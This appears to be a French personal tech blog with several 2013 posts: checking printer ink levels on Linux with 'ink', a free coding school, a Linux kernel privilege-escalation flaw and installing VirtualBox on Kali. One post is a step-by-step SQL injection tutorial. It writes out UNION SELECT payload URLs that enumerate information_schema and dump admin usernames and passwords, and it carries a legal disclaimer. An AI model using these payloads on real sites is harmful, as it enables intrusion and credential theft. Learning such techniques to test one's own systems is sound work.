vendredi 6 septembre 2013

Connaitre le niveau d'encre sous Linux



Pour connaître le niveau d'encre d'une imprimante, on utilise souvent un logiciel du constructeur, mais bien trop souvent, cette solution n'est que pour les windowsiens.

Pour les linuxiens qui veulent connaitre leur niveau d'encre je vous est trouver une solution:  ink

Il vous faudra  installer la bibliothèque libinklevel.
 sudo apt-get install libinklevel5
Ensuite, installer ink:
sudo apt-get install ink

Vous voilas, fin pret a connaitre votre niveau d'encre avec la commande suivante:
ink  -p usb
Ce qui nous donne comme résultat:

$ ink -p usb
ink v0.5.0 (c) 2009 Markus Heinz
Canon iP4500 series
Black:                          0%
Photoblack:                    40%
Yellow:                        40%
Magenta:                       40
Cyan:                         100%

Est pour connaitre les autres options que vous propose ink, un petit ink --help vous donneras la réponses.

jeudi 13 juin 2013

Tuto Faille SQLi



Je vais vous présentez un tuto plutôt sympas, qui va vous apprendre a réaliser des injection sql.


Je vous épargne les explications sur le pourquoi, du comment de cette faille, mais sachez  qu'une injection sql est possible, lorsque le code php est mal coder.(Si vous faites des recherche sur la failles, vous comprendrez facilement dont je vous parle).

Pour venir dans le vif du sujet, il faut trouver un site a tester (il faut savoir que l'intrusion/modification/altération d'un système de donnée, est punissable par le code pénal, donc a tester sur vos site, ou avec l'accord de l'auteur du site).

Nous allons prendre comme exemple de site www.exemple.fr/newscat.php?id=1

Nous allons tester notre site pour voir si il est faillible par la faille sql, nous ajoutons ' a la suite de l'url.

 www.exemple.fr/newscat.php?id=1'

Si notre site nous retourne, un erreur sql c'est que le site est sujet a la faille.

Nous allons donc tester le nombre de colonnes (important pour la suite).Nous ajoutons: espace order by 1-- ou espace order by 1/*

www.exemple.fr/newscat.php?id=1 order by 1--

Le site devrait s'afficher normalement,nous allons continuer jusqu’au moment ou le site va nous donner un erreur sql.

Vous faites donc.

www.exemple.fr/newscat.php?id=1 order by 10-- (le site s'affiche bien,donc nous avons au moins 10 colonnes)

www.exemple.fr/newscat.php?id=1 order by 11-- (le site nous donne une erreur sql,nous savons alors que le nombres de colonnes est de 10, puisqu'il ne nous a pas retourner d'erreur avec 10).

Nous allons tenter de trouver la colonnes qui contient les données qui peuvent nous intéresse,On ajoute union all select , a la place d' order by 1--.

www.exemple.fr/newscat.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10-- ( vous mettez a la suite autant de colonnes que vous avez trouvez au début avec order by *--).

Vous devriez voir des chiffres qui s'affiche sur votre page,ce sont les colonnes qui seront accessible.Nous allons dire que les colonnes 3,8,9 sont accessible car le site nous affiche la page normale + les chiffres 3,8,9.

Nous allons tenter de connaitre la version de la colonnes, nous remplaçons le nombre de la colonne que nous voulons tester par @@version, nous allons le faire avec la colonnes 3 dans notre exemple.

www.exemple.fr/newscat.php?id=1 union all select 1,2,@@version,4,5,6,7,8,9,10--

Si la version afficher est 4.* , alors passer votre chemin, si au contraire la version est 5.*, alors nous allons continuer.

Pour avoir le nom de la table (important pour la suite) nous remplaçons @@version , par table_name est nous ajoutons à la fin de notre url from information_schema.tables--.

www.exemple.fr/newscat.php?id=1 union all select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables--

Nous recherchons le plus souvent une table qui contient admin, dans notre exemple, la table s'appelle admin.(j'ai faciliter pour l'exemple).

Nous allons donc convertir le nom de la table en ASCII (textop.us/Text-Convert/Ascii), pour la table admin, la conversion sera donc => 097 100 109 105 110.

Nous devons remplacer les espace (parfois les espace seront remplacer par des  signes du style ;&#)vous remplacez donc par des virgules, les espaces, ou les signes, se qui nous donne pour notre colonnes admin => 097,100,109,105,110 (attention au virgules).

Ensuite changer  table_name par column_name est information_schema.tables par information_schema.columns where table_name=char(le code ASCII)

www.exemple.fr/newscat.php?id=1 union all select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns
where table_name=char(
097,100,109,105,110)--

Nous voyons qu'il y a une colonnes user est une colonnes password, nous pouvons donc afficher le nom est le mot de passe de notre admin.Car nous savons que l'id est contenue dans la colonnes user est pour le mot de passe la colonnes est password.
Supprimez tous ce qui se trouve après ...9,10  est ajouter
from admin et remplacer column-name par
concat(username,0x3a,password)
(0x3a est le code ASCII,qui permet  de séparer l'user du mot de passe). 


www.exemple.fr/newscat.php?id=1 union all select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 from admin

Nous avons donc admin:SontMotDePasse qui s'affiche.

Ce tuto a pour but la compréhension, est non l'appelle a l'intrusion des système, je ne pourrais être tenus responsable de vos actes.

Sachez qu'il existe des dorks, qui permette de trouver des site facilement faillibles, mais pour les raisons citer plus haut, je ne les mets pas a disposition, mais il se trouve sur google.




jeudi 16 mai 2013

Faire une école d’informatique gratuitement



J'ai vu cette infos ce matin au journal de game one, est je doit dire que Xavier Neal de chez  Free a toujours un longueur d'avance sur les concurrent (peut être un Steve Jobs en puissance??).

Il vous propose de postuler pour pouvoir faire une école d'informatique (apprendre a coder principalement), mais le tout GRATUITEMENT, est c'est là qu'il se différencie des autres, car il faut savoir qu'une année chez epitech coûte approximativement 8000e/année.

Pour ce qui veulent en savoir un peut plus:

-Tout le monde peut poser sa candidature
-Pas de Diplôme requis
-Etre âgée entre 18 est 30


Comment les sélections se passe?
Il suffis de vous rende sur le site 42 (créer pour l'occasion), remplissez le formulaire, ensuite vous aurez une série de 40 questions (culture générale/logique/compréhension), pour finir votre candidature.
Une fois cela fait, vous aurez des exercices a effectuer (ce sont les test), il faut réserver les places pour pouvoir les effectuer, mais aussi du temps, car certaine épreuve peuvent durer 2 h.
On ne peut pas faire de pause pendant que l'on fait l'épreuve, donc choisissez bien votre créneaux horaire pour être sur de pouvoir aller jusqu'au bout.

Vous saurez suite a ces épreuves si vous êtes retenue pour la suite des recrutement, pas la peine de vous dire que nous sommes déjà un bon nombres de candidats, alors je vous souhaite bonne chance dans vos démarche.

Je vous laisse l'interview qui est passé ce matin sur game one (sa commence à la 4.49min)





Faille dans le kernel Linux (2.6.37-3.8.8)



Une faille CRITIQUE, est qui est connut des devs du kernel de linux depuis bientôt 2 ans, n'as toujours pas été corriger.

Cette faille touche même les dernières version kernel, à savoir la 3.8.8, mais aussi les précédente versions qui on été compilé avec l'option CONFIG_PERF_EVENTS.

Cette dernière permet a un utilisateur sans droit de se donner les droit route de la machine/serveur, afin de foutre le gros bordel.

Par ailleurs  malgré le manque de patch, on nous assure que les futur kernel seront patché pour cette faille, qui je le rappelle date de plus de 2 ans.


Vous pouvez trouver les infos sur  le code source de l'exploit , ainsi que les détails de cette faille.


Merci a Korben de nous avoir prévenue.

mercredi 8 mai 2013

Installer VirtualBox sous kali (Backtrack 6)



Pour ceux qui ne le savent pas encore il y a quelque temps est sortie Kali, la petites sœur des distribution Backtrack.

Vous pourrez la trouvez sur le site de l'auteur,  si vous ne l'avez pas encore télécharger.

Une fois votre installation et vos réglage de kali finis, je vais vous montrer comment installer virtualbox, afin de tester les outils de cette distribution en local, sans risque pour les machines se trouvant sur votre réseau.

- Rendez-vous a cette adresse pour télécharger Virtualbox. Debian 6.0 ("Squeeze").
- Il faudra aussi installer "libssl0.9.8" que vous trouverez a cette adresse.
- Et en dernier le paquet "libqt4-opengl".
 
"apt-get install libqt4-opengl

Ensuite sa se passe comme n'importe qu'elle installation de .deb

" dpkg -i virtualbox-4.2_4.2.12-84980~Debian~squeeze_i386.deb"

Vous trouverez virtualbox dans Applications>Outils Système>Oracle VM VirtualBox.